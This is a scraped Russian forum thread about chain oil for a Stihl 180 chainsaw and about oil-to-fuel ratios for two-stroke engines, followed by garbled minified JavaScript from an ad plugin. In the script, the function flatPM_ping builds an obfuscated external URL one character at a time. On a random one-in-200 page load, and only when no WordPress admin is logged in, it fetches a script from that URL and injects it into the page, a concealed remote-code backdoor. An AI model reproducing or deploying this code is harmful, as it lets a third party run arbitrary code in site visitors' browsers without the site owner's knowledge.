а на штиль 180 какое масло для цепи можно?(на замену оригинальному), только с условием не ухудшения ресурса бензопилы. и не отработку (которую просто негде взять)
(в двиг всё же рекомендованное буду)

порадовали знания форумчан о модельных двигателях и смазке . сейчас есть нормальные масла для микродвигателей, которые лучше защищают мотор, не коксуются, позволяют снять характеристики, хорошо смешиваются со спиртами. компрессионники практически ушли — в продаже ни двигателей, ни топлива.тем более прогресс не стоит, набирают популярность бензинки с искровым зажиганием,15-ти кубовики уже вполне приличные, как двух так и четырехтактные. и масло там как правило обычное 2т из обычного магазина.

зато чистит и не ржавеет, а зверьё само не фиалками смердит.

в особо интимных случаях заправляют рапсовым, подсолнечным. например при разделке лося или КРС бензопилой

у нас так конечно не делают, но все же опыт интересный

дык о том и вопрос— какое?
а то что это за ответ? )))

Я вообще в этом сезоне на синтетике гоняю. На удивление (субъективно конечно) новая цепь поставленная в этом сезоне не вытянулась, да и как-то тупости особой не заметил. Пилил в сущности не очень много, обрезки досок с пилорамы, по кубам х.з. но много камаз с нарощенными бортами привозил.

С уважением, Никофар.

гг )))
вот этого: «Для смазки цепи бензопилы великолепно подойдет любое масло с обозначением по SAE,» и «масло было чистым, то есть не содержало в своем составе абразивных частиц и сохраняло свои показатели вязкости и текучести в рабочем диапазоне температур» было бы достаточно
остальное и так известно )))

просто в магазине не говорят ничего, у производителя ещё меньше информации (в основном рекламного толка)
а опыт был только с «дружбой» в которую вообще хрень всякая лилась )))
да и то при совке.
вот и не хочется методом тыка получать знания по правильной эксплуатации оборудования 😉

quote: Originally posted by Alexandr NN:

купил фирменного ШТИЛЕЛевского 230рр литр, литра этого хватило на 1.5 года

Alexandr NN, уважаемый,
Вы уж уточняйте, о чем речь ведете?

Если о масле для смазки цепи, то за 1,5 года Вы сожгли бензина около 1,7 литра на 1 литр смазки для цепи.
Это означает для меня, что Вы работали этой пилой за прошедшие годы только 2 часа и 27 минут, если у Вас на смазку цепи израсходовался только 1 (один) литр фирменного штилевского масла.

Если Вы имели ввиду масло для добавления в топливо и истратили 1 (один) литр, то тогда у меня получается, что за полтора года Вы сожгли 12,5 литров бензина, что могло бы обеспечить время непрерывной работы пилы на протяжении 16 часов и 40 минут или по полтора часа в месяц, или по выходным четыре раза в месяце по 20 минут за каждый уикенд. Или не более одного часа в каждые выходные, если отбросить «несезон» и оставить только летние месяцы.

Или я что-то не понимаю, или одно из двух.
Развейте, пожалуйста, мои сомнения.

Да уж. Оказывается, за мной тоже нужен пригляд и проверка моих расчетов.

Хотя, честно говоря, фиг его знает.
Наверное зависит от многих факторов:
— величины коэффициента трения скольжения в поршневой группе (ПГ) при смазке разными типами масел в составе топлива;
— изменениями физико-химических свойств масла под действием высоких температур и при сгорании вместе с топливом, коксуемость масла;
— отсутствием или наличием свойств детонировать под воздействием высоких температур и давлений;
— самим устройством ПГ того или иного двухтактного ДВС;
— свойствами материалов используемых в ПГ, в частности, стойкости к истиранию и равенством КТР в диапазоне рабочих температур ДВС;
— и многими другими особенностями двухтактного двигателя.

В частности, в штилях для уплотнения ПГ между компрессионными поршневыми кольцами применяется уплотнительная масса Dirko HT.
Почитать о ней и фирме, её производящей, кто владеет алиманской мовой, можно здесь:
http://www.elring.de/
Кто сей мове не обучен, можно и по-русски, вот тут: http://www.ekag1.de/pdf/dm_08/Dichtmassen_ru.pdf

Вообще, немчура в плане всяких хитростей в механике очень продвинутая.
Помню, когда в своей старенькой «авдюхе» ковырялся, то и дело приофигуевал от изощренности некоторых инженерных решений.

А я, со своей стороны, очень рад, что отказался в своё время от карьеры преподавателя для студиозусов-будущих инженеров. Потому что мне всё время хочется взять в руки указку подлиннее и потяжелее, например, лазерную зеленого такого свету ватт на двадцать, и, не сходя с кафедры аудитории, «уеппать» ею по шаловливым ручонкам умельцев, льющим масло в бензин для 2-тактного ДВС не 1/50, как написано в инструкции, а 1/40. Хотя на баночке с маслом, почему-то какой-то мастер масляных дел написал именно 1/50. Или 1/25 для другого вида масла в топливо.

Несмотря на пожелания другого участника, что хватило бы в моих объяснениях и просто «SAE и чистого», в очередной раз проведу ликбез для умельцев мешать бензин с маслом для топлива цепных пил с двухтактными моторчиками воздушного охлаждения.

Павел, Вы мне уже доказали, что Ваш здравый смысл одержал свою нелегкую победу над разумом в очередной раз — Вы не следуете писанным инструкциям. Поэтому, не сочтите за обиду, но прочитайте мои дальнейшие слова. И это не вопрос веры, а вопрос знания.

Масло в топливо двухтактника льют не от хорошей зажиточной жизни, а для того, чтобы продлить и так не богатую на продолжительность жизнь этого моторчика. Уж простите меня за тройную тавтологию в словах.
И масло в топливе имеет свою задачу довольно противоречивую — как у Терминатора в конце третьей серии — с одной стороны успеть смазать трущиеся поверхности, а с другой стороны достаточно полно сгореть к епеням собачьим и вылететь наружу, выполнив порученное ему дело и не повредив главного героя. Постаравшись при этом ещё и свечку не загадить и поменьше сернистых зольных частиц образовать, которые работают, как абразив при осаждении на стенках в ПГ.
На тему «Смазка 2-тактного ДВС» защищены за сотню лет не один десяток и не одна сотня, если не тысячи диссертаций, и оформлено патентов примерно в таком же количестве для расчета оптимального соотношения масла определенного состава в топливе с определенным октановым числом.

Чтобы этого масла было не больше и не меньше определенной величины в составе топлива. Понятно?
Еще раз прошу извинить за многократное повторение слова «определенно».

Поэтому, уже обращаясь ко всем, скажу:
— уважаемые, наливайте в бензин для 2Т ДВС именно то количество масла, которое написано на таре для его хранения в составе инструкции по его применению.
А то вы меня знаете — я не только ногой могу топнуть.
Но и «Ай-я-яй» сказать.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика